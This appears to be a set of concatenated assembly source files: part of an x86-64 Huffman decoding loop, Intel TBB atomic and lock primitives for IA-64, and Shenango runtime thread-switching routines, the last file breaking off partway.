push %r15
movq %rdi, %rax
movq 0(%rax), %ip0
movq 8(%rax), %ip1
movq 16(%rax), %ip2
movq 24(%rax), %ip3
movq 32(%rax), %op0
movq 40(%rax), %op1
movq 48(%rax), %op2
movq 56(%rax), %op3
movq 64(%rax), %bits0
movq 72(%rax), %bits1
movq 80(%rax), %bits2
movq 88(%rax), %bits3
movq 96(%rax), %dtable
push %rax /* argument */
push %rax /* olimit */
push 104(%rax) /* ilimit */
movq 112(%rax), %rax
push %rax /* oend3 */
movq %op3, %rax
push %rax /* oend2 */
movq %op2, %rax
push %rax /* oend1 */
movq %op1, %rax
push %rax /* oend0 */
/* Scratch space */
subq $8, %rsp
.L_4X2_compute_olimit:
/* Computes how many iterations we can do safely
* %r15, %rax may be clobbered
* rdx must be saved
* op[1,2,3,4] & ip0 mustn't be clobbered
*/
movq %rdx, 0(%rsp)
/* We can consume up to 7 input bytes each iteration. */
movq %ip0, %rax /* rax = ip0 */
movq 40(%rsp), %rdx /* rdx = ilimit */
subq %rdx, %rax /* rax = ip0 - ilimit */
movq %rax, %r15 /* r15 = ip0 - ilimit */
/* rdx = rax / 7 */
movabsq $2635249153387078803, %rdx
mulq %rdx
subq %rdx, %r15
shrq %r15
addq %r15, %rdx
shrq $2, %rdx
/* r15 = (ip0 - ilimit) / 7 */
movq %rdx, %r15
/* r15 = min(r15, min(oend0 - op0, oend1 - op1, oend2 - op2, oend3 - op3) / 10) */
movq 8(%rsp), %rax /* rax = oend0 */
subq %op0, %rax /* rax = oend0 - op0 */
movq 16(%rsp), %rdx /* rdx = oend1 */
subq %op1, %rdx /* rdx = oend1 - op1 */
cmpq %rax, %rdx
cmova %rax, %rdx /* rdx = min(%rdx, %rax) */
movq 24(%rsp), %rax /* rax = oend2 */
subq %op2, %rax /* rax = oend2 - op2 */
cmpq %rax, %rdx
cmova %rax, %rdx /* rdx = min(%rdx, %rax) */
movq 32(%rsp), %rax /* rax = oend3 */
subq %op3, %rax /* rax = oend3 - op3 */
cmpq %rax, %rdx
cmova %rax, %rdx /* rdx = min(%rdx, %rax) */
movabsq $-3689348814741910323, %rax
mulq %rdx
shrq $3, %rdx /* rdx = rdx / 10 */
/* r15 = min(%rdx, %r15) */
cmpq %rdx, %r15
cmova %rdx, %r15
/* olimit = op3 + 5 * r15 */
movq %r15, %rax
leaq (%op3, %rax, 4), %olimit
addq %rax, %olimit
movq 0(%rsp), %rdx
/* If (op3 + 10 > olimit) */
movq %op3, %rax /* rax = op3 */
addq $10, %rax /* rax = op3 + 10 */
cmpq %rax, %olimit /* op3 + 10 > olimit */
jb .L_4X2_exit
/* If (ip1 < ip0) go to exit */
cmpq %ip0, %ip1
jb .L_4X2_exit
/* If (ip2 < ip1) go to exit */
cmpq %ip1, %ip2
jb .L_4X2_exit
/* If (ip3 < ip2) go to exit */
cmpq %ip2, %ip3
jb .L_4X2_exit
#define DECODE(n, idx) \
movq %bits##n, %rax; \
shrq $53, %rax; \
movzwl 0(%dtable,%rax,4),%r8d; \
movzbl 2(%dtable,%rax,4),%r15d; \
movzbl 3(%dtable,%rax,4),%eax; \
movw %r8w, (%op##n); \
shlxq %r15, %bits##n, %bits##n; \
addq %rax, %op##n
#define RELOAD_BITS(n) \
bsfq %bits##n, %bits##n; \
movq %bits##n, %rax; \
shrq $3, %bits##n; \
andq $7, %rax; \
subq %bits##n, %ip##n; \
movq (%ip##n), %bits##n; \
orq $1, %bits##n; \
shlxq %rax, %bits##n, %bits##n
movq %olimit, 48(%rsp)
.p2align 6
.L_4X2_loop_body:
/* We clobber r8, so store it on the stack */
movq %r8, 0(%rsp)
/* Decode 5 symbols from each of the 4 streams (20 symbols total). */
FOR_EACH_STREAM_WITH_INDEX(DECODE, 0)
FOR_EACH_STREAM_WITH_INDEX(DECODE, 1)
FOR_EACH_STREAM_WITH_INDEX(DECODE, 2)
FOR_EACH_STREAM_WITH_INDEX(DECODE, 3)
FOR_EACH_STREAM_WITH_INDEX(DECODE, 4)
/* Reload r8 */
movq 0(%rsp), %r8
FOR_EACH_STREAM(RELOAD_BITS)
cmp %op3, 48(%rsp)
ja .L_4X2_loop_body
jmp .L_4X2_compute_olimit
#undef DECODE
#undef RELOAD_BITS
.L_4X2_exit:
addq $8, %rsp
/* Restore stack (oend & olimit) */
pop %rax /* oend0 */
pop %rax /* oend1 */
pop %rax /* oend2 */
pop %rax /* oend3 */
pop %rax /* ilimit */
pop %rax /* olimit */
pop %rax /* arg */
/* Save ip / op / bits */
movq %ip0, 0(%rax)
movq %ip1, 8(%rax)
movq %ip2, 16(%rax)
movq %ip3, 24(%rax)
movq %op0, 32(%rax)
movq %op1, 40(%rax)
movq %op2, 48(%rax)
movq %op3, 56(%rax)
movq %bits0, 64(%rax)
movq %bits1, 72(%rax)
movq %bits2, 80(%rax)
movq %bits3, 88(%rax)
/* Restore registers */
pop %r15
pop %r14
pop %r13
pop %r12
pop %r11
pop %r10
pop %r9
pop %r8
pop %rdi
pop %rsi
pop %rbp
pop %rdx
pop %rcx
pop %rbx
pop %rax
ret
#endif
|
aiekick/Lumo
| 1,304
|
3rdparty/taskflow/3rd-party/tbb/src/tbb/ia64-gas/log2.s
|
// Copyright (c) 2005-2020 Intel Corporation
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
.section .text
.align 16
// unsigned long __TBB_machine_lg( unsigned long x );
// r32 = x
.proc __TBB_machine_lg#
.global __TBB_machine_lg#
__TBB_machine_lg:
shr r16=r32,1 // .x
;;
shr r17=r32,2 // ..x
or r32=r32,r16 // xx
;;
shr r16=r32,3 // ...xx
or r32=r32,r17 // xxx
;;
shr r17=r32,5 // .....xxx
or r32=r32,r16 // xxxxx
;;
shr r16=r32,8 // ........xxxxx
or r32=r32,r17 // xxxxxxxx
;;
shr r17=r32,13
or r32=r32,r16 // 13x
;;
shr r16=r32,21
or r32=r32,r17 // 21x
;;
shr r17=r32,34
or r32=r32,r16 // 34x
;;
shr r16=r32,55
or r32=r32,r17 // 55x
;;
or r32=r32,r16 // 64x
;;
popcnt r8=r32
;;
add r8=-1,r8
br.ret.sptk.many b0
.endp __TBB_machine_lg#
|
aiekick/Lumo
| 15,124
|
3rdparty/taskflow/3rd-party/tbb/src/tbb/ia64-gas/atomic_support.s
|
// Copyright (c) 2005-2020 Intel Corporation
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
// DO NOT EDIT - AUTOMATICALLY GENERATED FROM tools/generate_atomic/ipf_generate.sh
# 1 "<stdin>"
# 1 "<built-in>"
# 1 "<command line>"
# 1 "<stdin>"
.section .text
.align 16
.proc __TBB_machine_fetchadd1__TBB_full_fence#
.global __TBB_machine_fetchadd1__TBB_full_fence#
__TBB_machine_fetchadd1__TBB_full_fence:
{
mf
br __TBB_machine_fetchadd1acquire
}
.endp __TBB_machine_fetchadd1__TBB_full_fence#
.proc __TBB_machine_fetchadd1acquire#
.global __TBB_machine_fetchadd1acquire#
__TBB_machine_fetchadd1acquire:
ld1 r9=[r32]
;;
Retry_1acquire:
mov ar.ccv=r9
mov r8=r9;
add r10=r9,r33
;;
cmpxchg1.acq r9=[r32],r10,ar.ccv
;;
cmp.ne p7,p0=r8,r9
(p7) br.cond.dpnt Retry_1acquire
br.ret.sptk.many b0
# 49 "<stdin>"
.endp __TBB_machine_fetchadd1acquire#
# 62 "<stdin>"
.section .text
.align 16
.proc __TBB_machine_fetchstore1__TBB_full_fence#
.global __TBB_machine_fetchstore1__TBB_full_fence#
__TBB_machine_fetchstore1__TBB_full_fence:
mf
;;
xchg1 r8=[r32],r33
br.ret.sptk.many b0
.endp __TBB_machine_fetchstore1__TBB_full_fence#
.proc __TBB_machine_fetchstore1acquire#
.global __TBB_machine_fetchstore1acquire#
__TBB_machine_fetchstore1acquire:
xchg1 r8=[r32],r33
br.ret.sptk.many b0
.endp __TBB_machine_fetchstore1acquire#
# 88 "<stdin>"
.section .text
.align 16
.proc __TBB_machine_cmpswp1__TBB_full_fence#
.global __TBB_machine_cmpswp1__TBB_full_fence#
__TBB_machine_cmpswp1__TBB_full_fence:
{
mf
br __TBB_machine_cmpswp1acquire
}
.endp __TBB_machine_cmpswp1__TBB_full_fence#
.proc __TBB_machine_cmpswp1acquire#
.global __TBB_machine_cmpswp1acquire#
__TBB_machine_cmpswp1acquire:
zxt1 r34=r34
;;
mov ar.ccv=r34
;;
cmpxchg1.acq r8=[r32],r33,ar.ccv
br.ret.sptk.many b0
.endp __TBB_machine_cmpswp1acquire#
// DO NOT EDIT - AUTOMATICALLY GENERATED FROM tools/generate_atomic/ipf_generate.sh
# 1 "<stdin>"
# 1 "<built-in>"
# 1 "<command line>"
# 1 "<stdin>"
.section .text
.align 16
.proc __TBB_machine_fetchadd2__TBB_full_fence#
.global __TBB_machine_fetchadd2__TBB_full_fence#
__TBB_machine_fetchadd2__TBB_full_fence:
{
mf
br __TBB_machine_fetchadd2acquire
}
.endp __TBB_machine_fetchadd2__TBB_full_fence#
.proc __TBB_machine_fetchadd2acquire#
.global __TBB_machine_fetchadd2acquire#
__TBB_machine_fetchadd2acquire:
ld2 r9=[r32]
;;
Retry_2acquire:
mov ar.ccv=r9
mov r8=r9;
add r10=r9,r33
;;
cmpxchg2.acq r9=[r32],r10,ar.ccv
;;
cmp.ne p7,p0=r8,r9
(p7) br.cond.dpnt Retry_2acquire
br.ret.sptk.many b0
# 49 "<stdin>"
.endp __TBB_machine_fetchadd2acquire#
# 62 "<stdin>"
.section .text
.align 16
.proc __TBB_machine_fetchstore2__TBB_full_fence#
.global __TBB_machine_fetchstore2__TBB_full_fence#
__TBB_machine_fetchstore2__TBB_full_fence:
mf
;;
xchg2 r8=[r32],r33
br.ret.sptk.many b0
.endp __TBB_machine_fetchstore2__TBB_full_fence#
.proc __TBB_machine_fetchstore2acquire#
.global __TBB_machine_fetchstore2acquire#
__TBB_machine_fetchstore2acquire:
xchg2 r8=[r32],r33
br.ret.sptk.many b0
.endp __TBB_machine_fetchstore2acquire#
# 88 "<stdin>"
.section .text
.align 16
.proc __TBB_machine_cmpswp2__TBB_full_fence#
.global __TBB_machine_cmpswp2__TBB_full_fence#
__TBB_machine_cmpswp2__TBB_full_fence:
{
mf
br __TBB_machine_cmpswp2acquire
}
.endp __TBB_machine_cmpswp2__TBB_full_fence#
.proc __TBB_machine_cmpswp2acquire#
.global __TBB_machine_cmpswp2acquire#
__TBB_machine_cmpswp2acquire:
zxt2 r34=r34
;;
mov ar.ccv=r34
;;
cmpxchg2.acq r8=[r32],r33,ar.ccv
br.ret.sptk.many b0
.endp __TBB_machine_cmpswp2acquire#
// DO NOT EDIT - AUTOMATICALLY GENERATED FROM tools/generate_atomic/ipf_generate.sh
# 1 "<stdin>"
# 1 "<built-in>"
# 1 "<command line>"
# 1 "<stdin>"
.section .text
.align 16
.proc __TBB_machine_fetchadd4__TBB_full_fence#
.global __TBB_machine_fetchadd4__TBB_full_fence#
__TBB_machine_fetchadd4__TBB_full_fence:
{
mf
br __TBB_machine_fetchadd4acquire
}
.endp __TBB_machine_fetchadd4__TBB_full_fence#
.proc __TBB_machine_fetchadd4acquire#
.global __TBB_machine_fetchadd4acquire#
__TBB_machine_fetchadd4acquire:
cmp.eq p6,p0=1,r33
cmp.eq p8,p0=-1,r33
(p6) br.cond.dptk Inc_4acquire
(p8) br.cond.dpnt Dec_4acquire
;;
ld4 r9=[r32]
;;
Retry_4acquire:
mov ar.ccv=r9
mov r8=r9;
add r10=r9,r33
;;
cmpxchg4.acq r9=[r32],r10,ar.ccv
;;
cmp.ne p7,p0=r8,r9
(p7) br.cond.dpnt Retry_4acquire
br.ret.sptk.many b0
Inc_4acquire:
fetchadd4.acq r8=[r32],1
br.ret.sptk.many b0
Dec_4acquire:
fetchadd4.acq r8=[r32],-1
br.ret.sptk.many b0
.endp __TBB_machine_fetchadd4acquire#
# 62 "<stdin>"
.section .text
.align 16
.proc __TBB_machine_fetchstore4__TBB_full_fence#
.global __TBB_machine_fetchstore4__TBB_full_fence#
__TBB_machine_fetchstore4__TBB_full_fence:
mf
;;
xchg4 r8=[r32],r33
br.ret.sptk.many b0
.endp __TBB_machine_fetchstore4__TBB_full_fence#
.proc __TBB_machine_fetchstore4acquire#
.global __TBB_machine_fetchstore4acquire#
__TBB_machine_fetchstore4acquire:
xchg4 r8=[r32],r33
br.ret.sptk.many b0
.endp __TBB_machine_fetchstore4acquire#
# 88 "<stdin>"
.section .text
.align 16
.proc __TBB_machine_cmpswp4__TBB_full_fence#
.global __TBB_machine_cmpswp4__TBB_full_fence#
__TBB_machine_cmpswp4__TBB_full_fence:
{
mf
br __TBB_machine_cmpswp4acquire
}
.endp __TBB_machine_cmpswp4__TBB_full_fence#
.proc __TBB_machine_cmpswp4acquire#
.global __TBB_machine_cmpswp4acquire#
__TBB_machine_cmpswp4acquire:
zxt4 r34=r34
;;
mov ar.ccv=r34
;;
cmpxchg4.acq r8=[r32],r33,ar.ccv
br.ret.sptk.many b0
.endp __TBB_machine_cmpswp4acquire#
// DO NOT EDIT - AUTOMATICALLY GENERATED FROM tools/generate_atomic/ipf_generate.sh
# 1 "<stdin>"
# 1 "<built-in>"
# 1 "<command line>"
# 1 "<stdin>"
.section .text
.align 16
.proc __TBB_machine_fetchadd8__TBB_full_fence#
.global __TBB_machine_fetchadd8__TBB_full_fence#
__TBB_machine_fetchadd8__TBB_full_fence:
{
mf
br __TBB_machine_fetchadd8acquire
}
.endp __TBB_machine_fetchadd8__TBB_full_fence#
.proc __TBB_machine_fetchadd8acquire#
.global __TBB_machine_fetchadd8acquire#
__TBB_machine_fetchadd8acquire:
cmp.eq p6,p0=1,r33
cmp.eq p8,p0=-1,r33
(p6) br.cond.dptk Inc_8acquire
(p8) br.cond.dpnt Dec_8acquire
;;
ld8 r9=[r32]
;;
Retry_8acquire:
mov ar.ccv=r9
mov r8=r9;
add r10=r9,r33
;;
cmpxchg8.acq r9=[r32],r10,ar.ccv
;;
cmp.ne p7,p0=r8,r9
(p7) br.cond.dpnt Retry_8acquire
br.ret.sptk.many b0
Inc_8acquire:
fetchadd8.acq r8=[r32],1
br.ret.sptk.many b0
Dec_8acquire:
fetchadd8.acq r8=[r32],-1
br.ret.sptk.many b0
.endp __TBB_machine_fetchadd8acquire#
# 62 "<stdin>"
.section .text
.align 16
.proc __TBB_machine_fetchstore8__TBB_full_fence#
.global __TBB_machine_fetchstore8__TBB_full_fence#
__TBB_machine_fetchstore8__TBB_full_fence:
mf
;;
xchg8 r8=[r32],r33
br.ret.sptk.many b0
.endp __TBB_machine_fetchstore8__TBB_full_fence#
.proc __TBB_machine_fetchstore8acquire#
.global __TBB_machine_fetchstore8acquire#
__TBB_machine_fetchstore8acquire:
xchg8 r8=[r32],r33
br.ret.sptk.many b0
.endp __TBB_machine_fetchstore8acquire#
# 88 "<stdin>"
.section .text
.align 16
.proc __TBB_machine_cmpswp8__TBB_full_fence#
.global __TBB_machine_cmpswp8__TBB_full_fence#
__TBB_machine_cmpswp8__TBB_full_fence:
{
mf
br __TBB_machine_cmpswp8acquire
}
.endp __TBB_machine_cmpswp8__TBB_full_fence#
.proc __TBB_machine_cmpswp8acquire#
.global __TBB_machine_cmpswp8acquire#
__TBB_machine_cmpswp8acquire:
mov ar.ccv=r34
;;
cmpxchg8.acq r8=[r32],r33,ar.ccv
br.ret.sptk.many b0
.endp __TBB_machine_cmpswp8acquire#
// DO NOT EDIT - AUTOMATICALLY GENERATED FROM tools/generate_atomic/ipf_generate.sh
# 1 "<stdin>"
# 1 "<built-in>"
# 1 "<command line>"
# 1 "<stdin>"
.section .text
.align 16
# 19 "<stdin>"
.proc __TBB_machine_fetchadd1release#
.global __TBB_machine_fetchadd1release#
__TBB_machine_fetchadd1release:
ld1 r9=[r32]
;;
Retry_1release:
mov ar.ccv=r9
mov r8=r9;
add r10=r9,r33
;;
cmpxchg1.rel r9=[r32],r10,ar.ccv
;;
cmp.ne p7,p0=r8,r9
(p7) br.cond.dpnt Retry_1release
br.ret.sptk.many b0
# 49 "<stdin>"
.endp __TBB_machine_fetchadd1release#
# 62 "<stdin>"
.section .text
.align 16
.proc __TBB_machine_fetchstore1release#
.global __TBB_machine_fetchstore1release#
__TBB_machine_fetchstore1release:
mf
;;
xchg1 r8=[r32],r33
br.ret.sptk.many b0
.endp __TBB_machine_fetchstore1release#
# 88 "<stdin>"
.section .text
.align 16
# 101 "<stdin>"
.proc __TBB_machine_cmpswp1release#
.global __TBB_machine_cmpswp1release#
__TBB_machine_cmpswp1release:
zxt1 r34=r34
;;
mov ar.ccv=r34
;;
cmpxchg1.rel r8=[r32],r33,ar.ccv
br.ret.sptk.many b0
.endp __TBB_machine_cmpswp1release#
// DO NOT EDIT - AUTOMATICALLY GENERATED FROM tools/generate_atomic/ipf_generate.sh
# 1 "<stdin>"
# 1 "<built-in>"
# 1 "<command line>"
# 1 "<stdin>"
.section .text
.align 16
# 19 "<stdin>"
.proc __TBB_machine_fetchadd2release#
.global __TBB_machine_fetchadd2release#
__TBB_machine_fetchadd2release:
ld2 r9=[r32]
;;
Retry_2release:
mov ar.ccv=r9
mov r8=r9;
add r10=r9,r33
;;
cmpxchg2.rel r9=[r32],r10,ar.ccv
;;
cmp.ne p7,p0=r8,r9
(p7) br.cond.dpnt Retry_2release
br.ret.sptk.many b0
# 49 "<stdin>"
.endp __TBB_machine_fetchadd2release#
# 62 "<stdin>"
.section .text
.align 16
.proc __TBB_machine_fetchstore2release#
.global __TBB_machine_fetchstore2release#
__TBB_machine_fetchstore2release:
mf
;;
xchg2 r8=[r32],r33
br.ret.sptk.many b0
.endp __TBB_machine_fetchstore2release#
# 88 "<stdin>"
.section .text
.align 16
# 101 "<stdin>"
.proc __TBB_machine_cmpswp2release#
.global __TBB_machine_cmpswp2release#
__TBB_machine_cmpswp2release:
zxt2 r34=r34
;;
mov ar.ccv=r34
;;
cmpxchg2.rel r8=[r32],r33,ar.ccv
br.ret.sptk.many b0
.endp __TBB_machine_cmpswp2release#
// DO NOT EDIT - AUTOMATICALLY GENERATED FROM tools/generate_atomic/ipf_generate.sh
# 1 "<stdin>"
# 1 "<built-in>"
# 1 "<command line>"
# 1 "<stdin>"
.section .text
.align 16
# 19 "<stdin>"
.proc __TBB_machine_fetchadd4release#
.global __TBB_machine_fetchadd4release#
__TBB_machine_fetchadd4release:
cmp.eq p6,p0=1,r33
cmp.eq p8,p0=-1,r33
(p6) br.cond.dptk Inc_4release
(p8) br.cond.dpnt Dec_4release
;;
ld4 r9=[r32]
;;
Retry_4release:
mov ar.ccv=r9
mov r8=r9;
add r10=r9,r33
;;
cmpxchg4.rel r9=[r32],r10,ar.ccv
;;
cmp.ne p7,p0=r8,r9
(p7) br.cond.dpnt Retry_4release
br.ret.sptk.many b0
Inc_4release:
fetchadd4.rel r8=[r32],1
br.ret.sptk.many b0
Dec_4release:
fetchadd4.rel r8=[r32],-1
br.ret.sptk.many b0
.endp __TBB_machine_fetchadd4release#
# 62 "<stdin>"
.section .text
.align 16
.proc __TBB_machine_fetchstore4release#
.global __TBB_machine_fetchstore4release#
__TBB_machine_fetchstore4release:
mf
;;
xchg4 r8=[r32],r33
br.ret.sptk.many b0
.endp __TBB_machine_fetchstore4release#
# 88 "<stdin>"
.section .text
.align 16
# 101 "<stdin>"
.proc __TBB_machine_cmpswp4release#
.global __TBB_machine_cmpswp4release#
__TBB_machine_cmpswp4release:
zxt4 r34=r34
;;
mov ar.ccv=r34
;;
cmpxchg4.rel r8=[r32],r33,ar.ccv
br.ret.sptk.many b0
.endp __TBB_machine_cmpswp4release#
// DO NOT EDIT - AUTOMATICALLY GENERATED FROM tools/generate_atomic/ipf_generate.sh
# 1 "<stdin>"
# 1 "<built-in>"
# 1 "<command line>"
# 1 "<stdin>"
.section .text
.align 16
# 19 "<stdin>"
.proc __TBB_machine_fetchadd8release#
.global __TBB_machine_fetchadd8release#
__TBB_machine_fetchadd8release:
cmp.eq p6,p0=1,r33
cmp.eq p8,p0=-1,r33
(p6) br.cond.dptk Inc_8release
(p8) br.cond.dpnt Dec_8release
;;
ld8 r9=[r32]
;;
Retry_8release:
mov ar.ccv=r9
mov r8=r9;
add r10=r9,r33
;;
cmpxchg8.rel r9=[r32],r10,ar.ccv
;;
cmp.ne p7,p0=r8,r9
(p7) br.cond.dpnt Retry_8release
br.ret.sptk.many b0
Inc_8release:
fetchadd8.rel r8=[r32],1
br.ret.sptk.many b0
Dec_8release:
fetchadd8.rel r8=[r32],-1
br.ret.sptk.many b0
.endp __TBB_machine_fetchadd8release#
# 62 "<stdin>"
.section .text
.align 16
.proc __TBB_machine_fetchstore8release#
.global __TBB_machine_fetchstore8release#
__TBB_machine_fetchstore8release:
mf
;;
xchg8 r8=[r32],r33
br.ret.sptk.many b0
.endp __TBB_machine_fetchstore8release#
# 88 "<stdin>"
.section .text
.align 16
# 101 "<stdin>"
.proc __TBB_machine_cmpswp8release#
.global __TBB_machine_cmpswp8release#
__TBB_machine_cmpswp8release:
mov ar.ccv=r34
;;
cmpxchg8.rel r8=[r32],r33,ar.ccv
br.ret.sptk.many b0
.endp __TBB_machine_cmpswp8release#
|
aiekick/Lumo
| 1,270
|
3rdparty/taskflow/3rd-party/tbb/src/tbb/ia64-gas/lock_byte.s
|
// Copyright (c) 2005-2020 Intel Corporation
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
// Support for class TinyLock
.section .text
.align 16
// unsigned int __TBB_machine_trylockbyte( byte& flag );
// r32 = address of flag
.proc __TBB_machine_trylockbyte#
.global __TBB_machine_trylockbyte#
ADDRESS_OF_FLAG=r32
RETCODE=r8
FLAG=r9
BUSY=r10
SCRATCH=r11
__TBB_machine_trylockbyte:
ld1.acq FLAG=[ADDRESS_OF_FLAG]
mov BUSY=1
mov RETCODE=0
;;
cmp.ne p6,p0=0,FLAG
mov ar.ccv=r0
(p6) br.ret.sptk.many b0
;;
cmpxchg1.acq SCRATCH=[ADDRESS_OF_FLAG],BUSY,ar.ccv // Try to acquire lock
;;
cmp.eq p6,p0=0,SCRATCH
;;
(p6) mov RETCODE=1
br.ret.sptk.many b0
.endp __TBB_machine_trylockbyte#
|
aiekick/Lumo
| 2,687
|
3rdparty/taskflow/3rd-party/tbb/src/tbb/ia64-gas/ia64_misc.s
|
// Copyright (c) 2005-2020 Intel Corporation
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
// RSE backing store pointer retrieval
.section .text
.align 16
.proc __TBB_get_bsp#
.global __TBB_get_bsp#
__TBB_get_bsp:
mov r8=ar.bsp
br.ret.sptk.many b0
.endp __TBB_get_bsp#
.section .text
.align 16
.proc __TBB_machine_load8_relaxed#
.global __TBB_machine_load8_relaxed#
__TBB_machine_load8_relaxed:
ld8 r8=[r32]
br.ret.sptk.many b0
.endp __TBB_machine_load8_relaxed#
.section .text
.align 16
.proc __TBB_machine_store8_relaxed#
.global __TBB_machine_store8_relaxed#
__TBB_machine_store8_relaxed:
st8 [r32]=r33
br.ret.sptk.many b0
.endp __TBB_machine_store8_relaxed#
.section .text
.align 16
.proc __TBB_machine_load4_relaxed#
.global __TBB_machine_load4_relaxed#
__TBB_machine_load4_relaxed:
ld4 r8=[r32]
br.ret.sptk.many b0
.endp __TBB_machine_load4_relaxed#
.section .text
.align 16
.proc __TBB_machine_store4_relaxed#
.global __TBB_machine_store4_relaxed#
__TBB_machine_store4_relaxed:
st4 [r32]=r33
br.ret.sptk.many b0
.endp __TBB_machine_store4_relaxed#
.section .text
.align 16
.proc __TBB_machine_load2_relaxed#
.global __TBB_machine_load2_relaxed#
__TBB_machine_load2_relaxed:
ld2 r8=[r32]
br.ret.sptk.many b0
.endp __TBB_machine_load2_relaxed#
.section .text
.align 16
.proc __TBB_machine_store2_relaxed#
.global __TBB_machine_store2_relaxed#
__TBB_machine_store2_relaxed:
st2 [r32]=r33
br.ret.sptk.many b0
.endp __TBB_machine_store2_relaxed#
.section .text
.align 16
.proc __TBB_machine_load1_relaxed#
.global __TBB_machine_load1_relaxed#
__TBB_machine_load1_relaxed:
ld1 r8=[r32]
br.ret.sptk.many b0
.endp __TBB_machine_load1_relaxed#
.section .text
.align 16
.proc __TBB_machine_store1_relaxed#
.global __TBB_machine_store1_relaxed#
__TBB_machine_store1_relaxed:
st1 [r32]=r33
br.ret.sptk.many b0
.endp __TBB_machine_store1_relaxed#
|
AIFM-sys/AIFM
| 4,487
|
shenango/runtime/switch.S
|
/*
* tf.S - assembly routines for switching trap frames
*/
/*
* Trap Frame Format
* WARNING: These values reflect the layout of struct thread_tf. Don't change
* these values without also updating defs.h.
*/
.file "switch.S"
.text
/* arguments registers (can be clobbered) */
#define RDI (0)
#define RSI (8)
#define RDX (16)
#define RCX (24)
#define R8 (32)
#define R9 (40)
/* temporary registers (can be clobbered) */
#define R10 (48)
#define R11 (56)
/* callee-saved registers (can not be clobbered) */
#define RBX (64)
#define RBP (72)
#define R12 (80)
#define R13 (88)
#define R14 (96)
#define R15 (104)
/* special-purpose registers */
#define RAX (112) /* return code */
#define RIP (120) /* instruction pointer */
#define RSP (128) /* stack pointer */
/**
* __jmp_thread - executes a thread from the runtime
* @tf: the trap frame to restore (%rdi)
*
* This low-level variant isn't intended to be called directly.
* Re-enables preemption, parking the kthread if necessary.
* Does not return.
*/
.align 16
.globl __jmp_thread
.type __jmp_thread, @function
__jmp_thread:
/* restore callee regs */
movq RBX(%rdi), %rbx
movq RBP(%rdi), %rbp
movq R12(%rdi), %r12
movq R13(%rdi), %r13
movq R14(%rdi), %r14
movq R15(%rdi), %r15
/* restore ip and stack */
movq RSP(%rdi), %rsp
movq RIP(%rdi), %rsi
/* set first argument (in case new thread) */
movq RDI(%rdi), %rdi /* ARG0 */
/* re-enable preemption */
subl $1, %fs:preempt_cnt@tpoff
jz 1f
/* jump into trap frame */
jmpq *%rsi
nop
1: /* cold-path, save RIP and park the kthread */
pushq %rsi
pushq %rdi
call preempt
popq %rdi
popq %rsi
jmpq *%rsi
/**
* __jmp_thread_direct - directly switches from one thread to the next
* @oldtf: the trap frame to save (%rdi)
* @newtf: the trap frame to restore (%rsi)
* @stack_busy: a pointer to the busy stack flag owned by the old thread (%rdx)
*
* This low-level variant isn't intended to be called directly.
* Re-enables preemption, parking the kthread if necessary.
* Does return.
*/
.align 16
.globl __jmp_thread_direct
.type __jmp_thread_direct, @function
__jmp_thread_direct:
/* save ip and stack */
movq (%rsp), %r8
movq %r8, RIP(%rdi)
leaq 8(%rsp), %r8
movq %r8, RSP(%rdi)
/* save callee regs */
movq %rbx, RBX(%rdi)
movq %rbp, RBP(%rdi)
movq %r12, R12(%rdi)
movq %r13, R13(%rdi)
movq %r14, R14(%rdi)
movq %r15, R15(%rdi)
/* restore ip and stack */
movq RSP(%rsi), %rsp
movq RIP(%rsi), %rcx
/* clear the stack busy flag */
movl $0, (%rdx)
/* restore callee regs */
movq RBX(%rsi), %rbx
movq RBP(%rsi), %rbp
movq R12(%rsi), %r12
movq R13(%rsi), %r13
movq R14(%rsi), %r14
movq R15(%rsi), %r15
/* set first argument (in case new thread) */
movq RDI(%rsi), %rdi /* ARG0 */
/* re-enable preemption */
subl $1, %fs:preempt_cnt@tpoff
jz 1f
/* jump into trap frame */
jmpq *%rcx
nop
1: /* cold-path, save RIP and park the kthread */
pushq %rcx
pushq %rdi
call preempt
popq %rdi
popq %rcx
jmpq *%rcx
/**
* __jmp_runtime - saves the current trap frame and jumps to a function in the
* runtime
* @tf: the struct thread_tf to save state (%rdi)
* @fn: the function pointer to call (%rsi)
* @stack: the start of the runtime stack (%rdx)
*
* This low-level variant isn't intended to be called directly.
* Must be called with preemption disabled.
* No return value.
*/
.align 16
.globl __jmp_runtime
.type __jmp_runtime, @function
__jmp_runtime:
/* save callee regs */
movq %rbx, RBX(%rdi)
movq %rbp, RBP(%rdi)
movq %r12, R12(%rdi)
movq %r13, R13(%rdi)
movq %r14, R14(%rdi)
movq %r15, R15(%rdi)
/* save ip and stack */
movq (%rsp), %r8
movq %r8, RIP(%rdi)
leaq 8(%rsp), %r8
movq %r8, RSP(%rdi)
/* jump into runtime function */
movq %rdx, %rsp
/* jump into runtime code */
jmpq *%rsi
/**
* __jmp_runtime_nosave - jumps to a function in the runtime without saving the
* current stack frame
* @fn: the function pointer to call (%rdi)
* @stack: the start of the runtime stack (%rsi)
*
* This low-level variant isn't intended to be called directly.
* Must be called with preemption disabled.
* No return value.
*/
.align 16
.globl __jmp_runtime_nosave
